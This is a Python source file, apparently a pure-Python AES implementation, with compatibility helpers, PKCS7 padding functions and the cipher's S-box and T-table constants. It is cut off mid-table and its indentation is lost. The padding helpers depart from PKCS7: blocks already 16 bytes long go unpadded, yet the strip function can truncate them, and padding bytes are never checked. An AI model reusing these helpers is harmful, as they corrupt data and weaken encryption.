# Python 3 compatibility
try:
xrange
except Exception:
xrange = range
# Python 3 supports bytes, which is already an array of integers
def _string_to_bytes(text):
if isinstance(text, bytes):
return text
return [ord(c) for c in text]
# In Python 3, we return bytes
def _bytes_to_string(binary):
return bytes(binary)
# Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first
def _concat_list(a, b):
return a + bytes(b)
def to_bufferable(binary):
if isinstance(binary, bytes):
return binary
return bytes(ord(b) for b in binary)
def _get_byte(c):
return c
def append_PKCS7_padding(data):
if (len(data) % 16) == 0:
return data
else:
pad = 16 - (len(data) % 16)
return data + to_bufferable(chr(pad) * pad)
def strip_PKCS7_padding(data):
if len(data) % 16 != 0:
raise ValueError("invalid length")
pad = _get_byte(data[-1])
if pad <= 16:
return data[:-pad]
else:
return data
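# Round-trip sketch for the PKCS7 helpers above (illustrative only). Note the
# non-standard convention: inputs whose length is already a multiple of 16
# bytes are passed through unpadded, so both peers must share this behaviour.
def _example_pkcs7_roundtrip():
    padded = append_PKCS7_padding(to_bufferable('staging data'))
    assert len(padded) % 16 == 0
    return strip_PKCS7_padding(padded)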
class AES(object):
'''Encapsulates the AES block cipher.
You generally should not need this. Use the AESModeOfOperation classes
below instead.'''
# Number of rounds by keysize
number_of_rounds = {16: 10, 24: 12, 32: 14}
# Round constant words
rcon = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91]
# S-box and Inverse S-box (S is for Substitution)
S = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
Si = [0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e, 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
# Transformations for encryption
T1 = [0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d, 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554, 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d, 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a, 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87, 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b, 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea, 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b, 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a, 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f, 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108, 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f, 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e, 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5, 0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d, 0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f, 0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e, 0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb, 0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce, 0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497, 0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c, 0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed, 0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b, 0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a, 0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16, 0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594, 0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81, 0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3, 0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a, 0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504, 0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163, 0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d, 0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f, 0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739, 0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47, 0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395, 0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f, 0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883, 0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c, 0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76, 0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e, 0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4, 0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6, 0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b, 0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7, 0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0, 0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25, 0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818, 0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72, 0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651, 0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21, 0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85, 0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa, 0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12, 0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0, 0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9, 0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133, 0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7, 0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920, 0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a, 0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17, 0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8, 0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11, 0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a]
T2 = [0xa5c66363, 0x84f87c7c, 0x99ee7777, 0x8df67b7b, 0x0dfff2f2, 0xbdd66b6b, 0xb1de6f6f, 0x5491c5c5, 0x50603030, 0x03020101, 0xa9ce6767, 0x7d562b2b, 0x19e7fefe, 0x62b5d7d7, 0xe64dabab, 0x9aec7676, 0x458fcaca, 0x9d1f8282, 0x4089c9c9, 0x87fa7d7d, 0x15effafa, 0xebb25959, 0xc98e4747, 0x0bfbf0f0, 0xec41adad, 0x67b3d4d4, 0xfd5fa2a2, 0xea45afaf, 0xbf239c9c, 0xf753a4a4, 0x96e47272, 0x5b9bc0c0, 0xc275b7b7, 0x1ce1fdfd, 0xae3d9393, 0x6a4c2626, 0x5a6c3636, 0x417e3f3f, 0x02f5f7f7, 0x4f83cccc, 0x5c683434, 0xf451a5a5, 0x34d1e5e5, 0x08f9f1f1, 0x93e27171, 0x73abd8d8, 0x53623131, 0x3f2a1515, 0x0c080404, 0x5295c7c7, 0x65462323, 0x5e9dc3c3, 0x28301818, 0xa1379696, 0x0f0a0505, 0xb52f9a9a, 0x090e0707, 0x36241212, 0x9b1b8080, 0x3ddfe2e2, 0x26cdebeb, 0x694e2727, 0xcd7fb2b2, 0x9fea7575, 0x1b120909, 0x9e1d8383, 0x74582c2c, 0x2e341a1a, 0x2d361b1b, 0xb2dc6e6e, 0xeeb45a5a, 0xfb5ba0a0, 0xf6a45252, 0x4d763b3b, 0x61b7d6d6, 0xce7db3b3, 0x7b522929, 0x3edde3e3, 0x715e2f2f, 0x97138484, 0xf5a65353, 0x68b9d1d1, 0x00000000, 0x2cc1eded, 0x60402020, 0x1fe3fcfc, 0xc879b1b1, 0xedb65b5b, 0xbed46a6a, 0x468dcbcb, 0xd967bebe, 0x4b723939, 0xde944a4a, 0xd4984c4c, 0xe8b05858, 0x4a85cfcf, 0x6bbbd0d0, 0x2ac5efef, 0xe54faaaa, 0x16edfbfb, 0xc5864343, 0xd79a4d4d, 0x55663333, 0x94118585, 0xcf8a4545, 0x10e9f9f9, 0x06040202, 0x81fe7f7f, 0xf0a05050, 0x44783c3c, 0xba259f9f, 0xe34ba8a8, 0xf3a25151, 0xfe5da3a3, 0xc0804040, 0x8a058f8f, 0xad3f9292, 0xbc219d9d, 0x48703838, 0x04f1f5f5, 0xdf63bcbc, 0xc177b6b6, 0x75afdada, 0x63422121, 0x30201010, 0x1ae5ffff, 0x0efdf3f3, 0x6dbfd2d2, 0x4c81cdcd, 0x14180c0c, 0x35261313, 0x2fc3ecec, 0xe1be5f5f, 0xa2359797, 0xcc884444, 0x392e1717, 0x5793c4c4, 0xf255a7a7, 0x82fc7e7e, 0x477a3d3d, 0xacc86464, 0xe7ba5d5d, 0x2b321919, 0x95e67373, 0xa0c06060, 0x98198181, 0xd19e4f4f, 0x7fa3dcdc, 0x66442222, 0x7e542a2a, 0xab3b9090, 0x830b8888, 0xca8c4646, 0x29c7eeee, 0xd36bb8b8, 0x3c281414, 0x79a7dede, 0xe2bc5e5e, 0x1d160b0b, 0x76addbdb, 0x3bdbe0e0, 0x56643232, 0x4e743a3a, 0x1e140a0a, 0xdb924949, 0x0a0c0606, 0x6c482424, 0xe4b85c5c, 0x5d9fc2c2, 0x6ebdd3d3, 0xef43acac, 0xa6c46262, 0xa8399191, 0xa4319595, 0x37d3e4e4, 0x8bf27979, 0x32d5e7e7, 0x438bc8c8, 0x596e3737, 0xb7da6d6d, 0x8c018d8d, 0x64b1d5d5, 0xd29c4e4e, 0xe049a9a9, 0xb4d86c6c, 0xfaac5656, 0x07f3f4f4, 0x25cfeaea, 0xafca6565, 0x8ef47a7a, 0xe947aeae, 0x18100808, 0xd56fbaba, 0x88f07878, 0x6f4a2525, 0x725c2e2e, 0x24381c1c, 0xf157a6a6, 0xc773b4b4, 0x5197c6c6, 0x23cbe8e8, 0x7ca1dddd, 0x9ce87474, 0x213e1f1f, 0xdd964b4b, 0xdc61bdbd, 0x860d8b8b, 0x850f8a8a, 0x90e07070, 0x427c3e3e, 0xc471b5b5, 0xaacc6666, 0xd8904848, 0x05060303, 0x01f7f6f6, 0x121c0e0e, 0xa3c26161, 0x5f6a3535, 0xf9ae5757, 0xd069b9b9, 0x91178686, 0x5899c1c1, 0x273a1d1d, 0xb9279e9e, 0x38d9e1e1, 0x13ebf8f8, 0xb32b9898, 0x33221111, 0xbbd26969, 0x70a9d9d9, 0x89078e8e, 0xa7339494, 0xb62d9b9b, 0x223c1e1e, 0x92158787, 0x20c9e9e9, 0x4987cece, 0xffaa5555, 0x78502828, 0x7aa5dfdf, 0x8f038c8c, 0xf859a1a1, 0x80098989, 0x171a0d0d, 0xda65bfbf, 0x31d7e6e6, 0xc6844242, 0xb8d06868, 0xc3824141, 0xb0299999, 0x775a2d2d, 0x111e0f0f, 0xcb7bb0b0, 0xfca85454, 0xd66dbbbb, 0x3a2c1616]
T3 = [0x63a5c663, 0x7c84f87c, 0x7799ee77, 0x7b8df67b, 0xf20dfff2, 0x6bbdd66b, 0x6fb1de6f, 0xc55491c5, 0x30506030, 0x01030201, 0x67a9ce67, 0x2b7d562b, 0xfe19e7fe, 0xd762b5d7, 0xabe64dab, 0x769aec76, 0xca458fca, 0x829d1f82, 0xc94089c9, 0x7d87fa7d, 0xfa15effa, 0x59ebb259, 0x47c98e47, 0xf00bfbf0, 0xadec41ad, 0xd467b3d4, 0xa2fd5fa2, 0xafea45af, 0x9cbf239c, 0xa4f753a4, 0x7296e472, 0xc05b9bc0, 0xb7c275b7, 0xfd1ce1fd, 0x93ae3d93, 0x266a4c26, 0x365a6c36, 0x3f417e3f, 0xf702f5f7, 0xcc4f83cc, 0x345c6834, 0xa5f451a5, 0xe534d1e5, 0xf108f9f1, 0x7193e271, 0xd873abd8, 0x31536231, 0x153f2a15, 0x040c0804, 0xc75295c7, 0x23654623, 0xc35e9dc3, 0x18283018, 0x96a13796, 0x050f0a05, 0x9ab52f9a, 0x07090e07, 0x12362412, 0x809b1b80, 0xe23ddfe2, 0xeb26cdeb, 0x27694e27, 0xb2cd7fb2, 0x759fea75, 0x091b1209, 0x839e1d83, 0x2c74582c, 0x1a2e341a, 0x1b2d361b, 0x6eb2dc6e, 0x5aeeb45a, 0xa0fb5ba0, 0x52f6a452, 0x3b4d763b, 0xd661b7d6, 0xb3ce7db3, 0x297b5229, 0xe33edde3, 0x2f715e2f, 0x84971384, 0x53f5a653, 0xd168b9d1, 0x00000000, 0xed2cc1ed, 0x20604020, 0xfc1fe3fc, 0xb1c879b1, 0x5bedb65b, 0x6abed46a, 0xcb468dcb, 0xbed967be, 0x394b7239, 0x4ade944a, 0x4cd4984c, 0x58e8b058, 0xcf4a85cf, 0xd06bbbd0, 0xef2ac5ef, 0xaae54faa, 0xfb16edfb, 0x43c58643, 0x4dd79a4d, 0x33556633, 0x85941185, 0x45cf8a45, 0xf910e9f9, 0x02060402, 0x7f81fe7f, 0x50f0a050, 0x3c44783c, 0x9fba259f, 0xa8e34ba8, 0x51f3a251, 0xa3fe5da3, 0x40c08040, 0x8f8a058f, 0x92ad3f92, 0x9dbc219d, 0x38487038, 0xf504f1f5, 0xbcdf63bc, 0xb6c177b6, 0xda75afda, 0x21634221, 0x10302010, 0xff1ae5ff, 0xf30efdf3, 0xd26dbfd2, 0xcd4c81cd, 0x0c14180c, 0x13352613, 0xec2fc3ec, 0x5fe1be5f, 0x97a23597, 0x44cc8844, 0x17392e17, 0xc45793c4, 0xa7f255a7, 0x7e82fc7e, 0x3d477a3d, 0x64acc864, 0x5de7ba5d, 0x192b3219, 0x7395e673, 0x60a0c060, 0x81981981, 0x4fd19e4f, 0xdc7fa3dc, 0x22664422, 0x2a7e542a, 0x90ab3b90, 0x88830b88, 0x46ca8c46, 0xee29c7ee, 0xb8d36bb8, 0x143c2814, 0xde79a7de, 0x5ee2bc5e, 0x0b1d160b, 0xdb76addb, 0xe03bdbe0, 0x32566432, 0x3a4e743a, 0x0a1e140a, 0x49db9249, 0x060a0c06, 0x246c4824, 0x5ce4b85c, 0xc25d9fc2, 0xd36ebdd3, 0xacef43ac, 0x62a6c462, 0x91a83991, 0x95a43195, 0xe437d3e4, 0x798bf279, 0xe732d5e7, 0xc8438bc8, 0x37596e37, 0x6db7da6d, 0x8d8c018d, 0xd564b1d5, 0x4ed29c4e, 0xa9e049a9, 0x6cb4d86c, 0x56faac56, 0xf407f3f4, 0xea25cfea, 0x65afca65, 0x7a8ef47a, 0xaee947ae, 0x08181008, 0xbad56fba, 0x7888f078, 0x256f4a25, 0x2e725c2e, 0x1c24381c, 0xa6f157a6, 0xb4c773b4, 0xc65197c6, 0xe823cbe8, 0xdd7ca1dd, 0x749ce874, 0x1f213e1f, 0x4bdd964b, 0xbddc61bd, 0x8b860d8b, 0x8a850f8a, 0x7090e070, 0x3e427c3e, 0xb5c471b5, 0x66aacc66, 0x48d89048, 0x03050603, 0xf601f7f6, 0x0e121c0e, 0x61a3c261, 0x355f6a35, 0x57f9ae57, 0xb9d069b9, 0x86911786, 0xc15899c1, 0x1d273a1d, 0x9eb9279e, 0xe138d9e1, 0xf813ebf8, 0x98b32b98, 0x11332211, 0x69bbd269, 0xd970a9d9, 0x8e89078e, 0x94a73394, 0x9bb62d9b, 0x1e223c1e, 0x87921587, 0xe920c9e9, 0xce4987ce, 0x55ffaa55, 0x28785028, 0xdf7aa5df, 0x8c8f038c, 0xa1f859a1, 0x89800989, 0x0d171a0d, 0xbfda65bf, 0xe631d7e6, 0x42c68442, 0x68b8d068, 0x41c38241, 0x99b02999, 0x2d775a2d, 0x0f111e0f, 0xb0cb7bb0, 0x54fca854, 0xbbd66dbb, 0x163a2c16]
T4 = [0x6363a5c6, 0x7c7c84f8, 0x777799ee, 0x7b7b8df6, 0xf2f20dff, 0x6b6bbdd6, 0x6f6fb1de, 0xc5c55491, 0x30305060, 0x01010302, 0x6767a9ce, 0x2b2b7d56, 0xfefe19e7, 0xd7d762b5, 0xababe64d, 0x76769aec, 0xcaca458f, 0x82829d1f, 0xc9c94089, 0x7d7d87fa, 0xfafa15ef, 0x5959ebb2, 0x4747c98e, 0xf0f00bfb, 0xadadec41, 0xd4d467b3, 0xa2a2fd5f, 0xafafea45, 0x9c9cbf23, 0xa4a4f753, 0x727296e4, 0xc0c05b9b, 0xb7b7c275, 0xfdfd1ce1, 0x9393ae3d, 0x26266a4c, 0x36365a6c, 0x3f3f417e, 0xf7f702f5, 0xcccc4f83, 0x34345c68, 0xa5a5f451, 0xe5e534d1, 0xf1f108f9, 0x717193e2, 0xd8d873ab, 0x31315362, 0x15153f2a, 0x04040c08, 0xc7c75295, 0x23236546, 0xc3c35e9d, 0x18182830, 0x9696a137, 0x05050f0a, 0x9a9ab52f, 0x0707090e, 0x12123624, 0x80809b1b, 0xe2e23ddf, 0xebeb26cd, 0x2727694e, 0xb2b2cd7f, 0x75759fea, 0x09091b12, 0x83839e1d, 0x2c2c7458, 0x1a1a2e34, 0x1b1b2d36, 0x6e6eb2dc, 0x5a5aeeb4, 0xa0a0fb5b, 0x5252f6a4, 0x3b3b4d76, 0xd6d661b7, 0xb3b3ce7d, 0x29297b52, 0xe3e33edd, 0x2f2f715e, 0x84849713, 0x5353f5a6, 0xd1d168b9, 0x00000000, 0xeded2cc1, 0x20206040, 0xfcfc1fe3, 0xb1b1c879, 0x5b5bedb6, 0x6a6abed4, 0xcbcb468d, 0xbebed967, 0x39394b72, 0x4a4ade94, 0x4c4cd498, 0x5858e8b0, 0xcfcf4a85, 0xd0d06bbb, 0xefef2ac5, 0xaaaae54f, 0xfbfb16ed, 0x4343c586, 0x4d4dd79a, 0x33335566, 0x85859411, 0x4545cf8a, 0xf9f910e9, 0x02020604, 0x7f7f81fe, 0x5050f0a0, 0x3c3c4478, 0x9f9fba25, 0xa8a8e34b, 0x5151f3a2, 0xa3a3fe5d, 0x4040c080, 0x8f8f8a05, 0x9292ad3f, 0x9d9dbc21, 0x38384870, 0xf5f504f1, 0xbcbcdf63, 0xb6b6c177, 0xdada75af, 0x21216342, 0x10103020, 0xffff1ae5, 0xf3f30efd, 0xd2d26dbf, 0xcdcd4c81, 0x0c0c1418, 0x13133526, 0xecec2fc3, 0x5f5fe1be, 0x9797a235, 0x4444cc88, 0x1717392e, 0xc4c45793, 0xa7a7f255, 0x7e7e82fc, 0x3d3d477a, 0x6464acc8, 0x5d5de7ba, 0x19192b32, 0x737395e6, 0x6060a0c0, 0x81819819, 0x4f4fd19e, 0xdcdc7fa3, 0x22226644, 0x2a2a7e54, 0x9090ab3b, 0x8888830b, 0x4646ca8c, 0xeeee29c7, 0xb8b8d36b, 0x14143c28, 0xdede79a7, 0x5e5ee2bc, 0x0b0b1d16, 0xdbdb76ad, 0xe0e03bdb, 0x32325664, 0x3a3a4e74, 0x0a0a1e14, 0x4949db92, 0x06060a0c, 0x24246c48, 0x5c5ce4b8, 0xc2c25d9f, 0xd3d36ebd, 0xacacef43, 0x6262a6c4, 0x9191a839, 0x9595a431, 0xe4e437d3, 0x79798bf2, 0xe7e732d5, 0xc8c8438b, 0x3737596e, 0x6d6db7da, 0x8d8d8c01, 0xd5d564b1, 0x4e4ed29c, 0xa9a9e049, 0x6c6cb4d8, 0x5656faac, 0xf4f407f3, 0xeaea25cf, 0x6565afca, 0x7a7a8ef4, 0xaeaee947, 0x08081810, 0xbabad56f, 0x787888f0, 0x25256f4a, 0x2e2e725c, 0x1c1c2438, 0xa6a6f157, 0xb4b4c773, 0xc6c65197, 0xe8e823cb, 0xdddd7ca1, 0x74749ce8, 0x1f1f213e, 0x4b4bdd96, 0xbdbddc61, 0x8b8b860d, 0x8a8a850f, 0x707090e0, 0x3e3e427c, 0xb5b5c471, 0x6666aacc, 0x4848d890, 0x03030506, 0xf6f601f7, 0x0e0e121c, 0x6161a3c2, 0x35355f6a, 0x5757f9ae, 0xb9b9d069, 0x86869117, 0xc1c15899, 0x1d1d273a, 0x9e9eb927, 0xe1e138d9, 0xf8f813eb, 0x9898b32b, 0x11113322, 0x6969bbd2, 0xd9d970a9, 0x8e8e8907, 0x9494a733, 0x9b9bb62d, 0x1e1e223c, 0x87879215, 0xe9e920c9, 0xcece4987, 0x5555ffaa, 0x28287850, 0xdfdf7aa5, 0x8c8c8f03, 0xa1a1f859, 0x89898009, 0x0d0d171a, 0xbfbfda65, 0xe6e631d7, 0x4242c684, 0x6868b8d0, 0x4141c382, 0x9999b029, 0x2d2d775a, 0x0f0f111e, 0xb0b0cb7b, 0x5454fca8, 0xbbbbd66d, 0x16163a2c]
# Transformations for decryption
T5 = [0x51f4a750, 0x7e416553, 0x1a17a4c3, 0x3a275e96, 0x3bab6bcb, 0x1f9d45f1, 0xacfa58ab, 0x4be30393, 0x2030fa55, 0xad766df6, 0x88cc7691, 0xf5024c25, 0x4fe5d7fc, 0xc52acbd7, 0x26354480, 0xb562a38f, 0xdeb15a49, 0x25ba1b67, 0x45ea0e98, 0x5dfec0e1, 0xc32f7502, 0x814cf012, 0x8d4697a3, 0x6bd3f9c6, 0x038f5fe7, 0x15929c95, 0xbf6d7aeb, 0x955259da, 0xd4be832d, 0x587421d3, 0x49e06929, 0x8ec9c844, 0x75c2896a, 0xf48e7978, 0x99583e6b, 0x27b971dd, 0xbee14fb6, 0xf088ad17, 0xc920ac66, 0x7dce3ab4, 0x63df4a18, 0xe51a3182, 0x97513360, 0x62537f45, 0xb16477e0, 0xbb6bae84, 0xfe81a01c, 0xf9082b94, 0x70486858, 0x8f45fd19, 0x94de6c87, 0x527bf8b7, 0xab73d323, 0x724b02e2, 0xe31f8f57, 0x6655ab2a, 0xb2eb2807, 0x2fb5c203, 0x86c57b9a, 0xd33708a5, 0x302887f2, 0x23bfa5b2, 0x02036aba, 0xed16825c, 0x8acf1c2b, 0xa779b492, 0xf307f2f0, 0x4e69e2a1, 0x65daf4cd, 0x0605bed5, 0xd134621f, 0xc4a6fe8a, 0x342e539d, 0xa2f355a0, 0x058ae132, 0xa4f6eb75, 0x0b83ec39, 0x4060efaa, 0x5e719f06, 0xbd6e1051, 0x3e218af9, 0x96dd063d, 0xdd3e05ae, 0x4de6bd46, 0x91548db5, 0x71c45d05, 0x0406d46f, 0x605015ff, 0x1998fb24, 0xd6bde997, 0x894043cc, 0x67d99e77, 0xb0e842bd, 0x07898b88, 0xe7195b38, 0x79c8eedb, 0xa17c0a47, 0x7c420fe9, 0xf8841ec9, 0x00000000, 0x09808683, 0x322bed48, 0x1e1170ac, 0x6c5a724e, 0xfd0efffb, 0x0f853856, 0x3daed51e, 0x362d3927, 0x0a0fd964, 0x685ca621, 0x9b5b54d1, 0x24362e3a, 0x0c0a67b1, 0x9357e70f, 0xb4ee96d2, 0x1b9b919e, 0x80c0c54f, 0x61dc20a2, 0x5a774b69, 0x1c121a16, 0xe293ba0a, 0xc0a02ae5, 0x3c22e043, 0x121b171d, 0x0e090d0b, 0xf28bc7ad, 0x2db6a8b9, 0x141ea9c8, 0x57f11985, 0xaf75074c, 0xee99ddbb, 0xa37f60fd, 0xf701269f, 0x5c72f5bc, 0x44663bc5, 0x5bfb7e34, 0x8b432976, 0xcb23c6dc, 0xb6edfc68, 0xb8e4f163, 0xd731dcca, 0x42638510, 0x13972240, 0x84c61120, 0x854a247d, 0xd2bb3df8, 0xaef93211, 0xc729a16d, 0x1d9e2f4b, 0xdcb230f3, 0x0d8652ec, 0x77c1e3d0, 0x2bb3166c, 0xa970b999, 0x119448fa, 0x47e96422, 0xa8fc8cc4, 0xa0f03f1a, 0x567d2cd8, 0x223390ef, 0x87494ec7, 